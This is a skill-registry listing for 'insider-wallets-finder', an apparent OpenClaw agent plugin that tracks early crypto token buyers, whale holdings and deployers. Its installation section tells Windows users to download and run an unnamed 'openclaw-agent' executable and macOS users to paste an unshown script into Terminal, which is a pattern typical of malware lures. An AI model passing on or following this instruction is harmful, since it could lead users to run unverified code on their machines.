ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

insider-wallets-finder

Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.

Why use this skill?

Discover early token buyers, track whale accumulation, and analyze smart money activity with the insider-wallets-finder OpenClaw skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-btj6c
Or

What This Skill Does

The insider-wallets-finder skill is a powerful analytical toolkit designed for OpenClaw agents to perform on-chain forensics. It enables users to identify smart money by tracking early token buyers, monitoring whale accumulation, and analyzing deployer contract history across Ethereum and Solana networks. By leveraging Etherscan and Birdeye APIs, the skill transforms raw blockchain data into actionable alpha, helping users identify consistently profitable traders and track the flow of capital in the decentralized finance ecosystem.

Installation

To install this skill, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-btj6c

IMPORTANT: This skill relies on the openclaw-agent utility for data processing.

  • Windows: Download the openclaw-agent and run the executable.
  • macOS: Copy the installation script from this guide into your Terminal.

Use Cases

  • Early Bird Discovery: Detect wallets that purchased tokens in the first 100 transactions to find 'sniper' or 'insider' activity.
  • Deployer Profiling: Verify the legitimacy of a project by analyzing the deployer's past contract deployments to spot serial ruggers or experienced developers.
  • Whale Tracking: Monitor the top 50 holders of a specific token to observe accumulation patterns and institutional movements.
  • Profitability Research: Aggregate Uniswap trade data to identify wallets with high-volume, high-USD swap success rates.

Example Prompts

  1. "Find the top 20 earliest buyers for the contract address 0xToken... and let me know if any of them have bought multiple similar tokens."
  2. "Check the deployer history for this token address. Have they deployed any other contracts in the last 30 days?"
  3. "Analyze the current whale distribution for this token. List the top 10 holders and their recent accumulation trends."

Tips & Limitations

  • API Keys: Always ensure your Etherscan and Birdeye API keys are valid and properly configured, as rate limits can occur during high-volume queries.
  • Privacy: Be aware that on-chain data is public; however, connecting specific addresses to real-world identities involves external analysis. Use this tool for research purposes only.
  • Data Latency: Large token datasets may take a few seconds to process; ensure your local openclaw-agent process is active to prevent timeouts.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-insider-wallets-finder-btj6c": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#defi#on-chain#finance#analytics
Safety Score: 3/5

Flags: network-access, external-api, code-execution